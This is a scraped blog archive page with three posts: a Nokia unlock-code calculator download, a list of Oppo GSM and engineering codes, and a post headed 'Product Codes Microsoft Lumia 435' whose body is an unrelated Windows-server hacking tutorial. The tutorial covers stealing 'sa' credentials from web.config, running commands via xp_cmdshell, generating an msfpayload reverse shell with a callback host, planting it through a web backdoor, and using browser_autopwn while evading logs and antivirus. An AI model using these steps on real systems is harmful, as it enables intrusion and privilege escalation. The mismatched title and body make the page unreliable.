Showing posts with label codes. Show all posts
Showing posts with label codes. Show all posts

Thursday, 31 August 2017

Nokia Free Unlock Codes Calculator Latest v3 10 Free Download

Nokia Free Unlock Codes Calculator Latest v3 10 Free Download

NokiaFree Unlock Codes Calculator is a great tool developed and unloaded by Nokiafree. It allows you to use your mobile phone with any service provider all around the world. Just download NokaFree Unlock Codes Calculator from our website.

Remove, repair sim restrictions and unlock Nokia, Samsung, Panasonic, Sony, NEC, Siemens, Vitel, AEG/Telital, Alcatel mobile brands. How to use this tool.
How To Use:
First of all you have to download and install NokiaFree unlock Codes
calculator. Download link is given at the bottom of this page.
You need your device IMEI.
You can get your device by by pressing *#06# at your mobile keyboard.
Now select the operator company.
Finally generate and get the unlock code.



Download NokiaFree Unlock Code Calculator v3.10

download file now

Read more »

Sunday, 27 August 2017

Oppo ColorOS Secret All Codes Chek Here

Oppo ColorOS Secret All Codes Chek Here



Hello GSM Friends Chek this Secret code for oppo mobiles I hope its usefull for you ,



GSM codes for OPPO R5
Change PIN PIN code or Personal identification number, numeric password to authenticate a user of an ATM or credit card. If you suspect that your handset has become blocked, you may need a PUK Code. PUK stands for Personal Unblocking Key. If you have entered your PIN code incorrectly 3 times your sim card will be blocked and you will be unable to make and receive calls/texts. - ** 04 *, then enter the PIN old, and twice a new PIN.
Change PIN2 - ** 042 *, then enter the old The PIN2, and twice the new PIN2.
Unlock SIM-card (PIN) - ** 05 * then enter the PUK and new PIN twice
Unlock SIM-card (PIN2) - ** 052 *, then enter the PUK2 and new PIN2 twice
Call Forwarding (you have to order the service from the operator)
##002# - Cancel all diverts
##004# - Cancel all conditional call forwarding
**004* phone number # - Activate all conditional call forwarding
Unconditional call forwarding (Call Forward All)
###21 - Switch off and deactivate
#21# - Deactivate
**21*phone number# - Enable and Activate
*21# - Activate
*#21# - Check the condition
Diversion in case of "no answer"
###61 - Switch off and deactivate
#61# - Deactivate
**61* phone number# - Enable and Activate
*61# - Activate
*#61# - Check the condition

Setting the call time until the call forwarding option "no answer"
When installing forwarding on "no answer" you can set the time in seconds that the system allows you to hook. If during this time you have not picked up the phone, the incoming call will be diverted.
Example: - ** 61 * + ** 709576617601234 # 30 - set the waiting time of 30 seconds
Set timeout - ** 61 * Phone Number ** N #, N = 5..30 (seconds)
Remove the previous installation - ## 61 #
Diversion in case of "not available"
# ## 62 - Switch off and deactivate
# 62 # - Deactivate
** 62 *phone number# - Enable and Activate
* 62 # - Activate
* # 62 # - Check the condition

Diversion in case of "busy"
###67 - Switch off and deactivate
#67# - Deactivate
**67*phone number# - Enable and Activate
*67# - Activate
*#67# - Check the condition
Call Barring (you have to order the service from the operator)
Change the password for all bans (default - 0000)
- ** 03 * 330 * old password * new password * new password #
Barring of all outgoing calls
**33*password# - Activate
#33*password# - Deactivate
*#33# - Check the condition
Barring of all calls

**330*password# - Activate
#330*password# - Deactivate
*#330# - Check the condition
Barring of all outgoing international calls
**331*password# - Activate
#331*password# - Deactivate
*#331# - Check the condition
Barring of all outgoing calls
**333*password# - Activate
#333*password# - Deactivate
*#333# - Check the condition
Barring of all incoming calls
**353*password# - Activate
#353*password# - Deactivate
*#353# - Check the condition
Barring all incoming calls when roaming
**351*password# - Activate
#351*password# - Deactivate
*#351# - Check the condition

Call waiting (you have to order the service from the operator)
*43# - Activate
#43# - Deactivate
*#43# - Check the condition
Transfer your phone number (Anti ANI)
#30#phone number - Block
*30#phone number - Allow
*#30# - Check the condition
Show phone number of the caller you (ANI)
#77# - Block
*77# - Allow
*#77# - Check the condition
Smart menu
GP - *111#
Rob - *140#

Other hidden code latest F1S.
entering *#8778# will result an immediate factory reset! - See more at:
*#800# � Enter engineering mode
*#801# � Engineering switch test mode (dangerous)
*#802# � enter automatically engineering TTFF GPS test mode
*#803# � enter engineering network test mode
*#804# � automatic disconnect test mode
*#805# � engineering Bluetooth test mode
*#806# � engineering aging test mode
*#807# � enter engineering test mode
*#808# � enter manual engineering test mode
*#809# � enter engineering echo test mode
*#888# � view hardware pcb version
*#900# � test photograph RGB
*#06# � view this machine mobile communication international recognition id
*#99# � screen lights long bright
*#6776# � machine info
*#1234# � view software details
`
*#36446337# � test function instruction
Finally *#1234# will show your firmware version number.


download file now

Read more »

Saturday, 5 August 2017

Product Codes Microsoft Lumia 435 RM 1069 1068 1070

Product Codes Microsoft Lumia 435 RM 1069 1068 1070


Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.


But, these get the job done only on Linux servers. What about windows servers?


Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using "sa" account to execute commands by MSSQL query via xp_cmdshell stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Note: 11 FIREFOX ADDONS A HACKER MUST HAVE AND USE
Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell- 
Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.

Hacking Windows Servers

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download ithere.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Hacking Windows Servers

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-
xp_cmdshell [command]

For example, if I need to know my current privileges, I would query-
xp_cmdshell whoami

Hacking Windows Servers

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload- 
This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.

For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now its time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.

Hacking Windows Servers

3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what Im trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-
iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

Hacking Windows Servers

4. Using readily available tools-

download file now

Read more »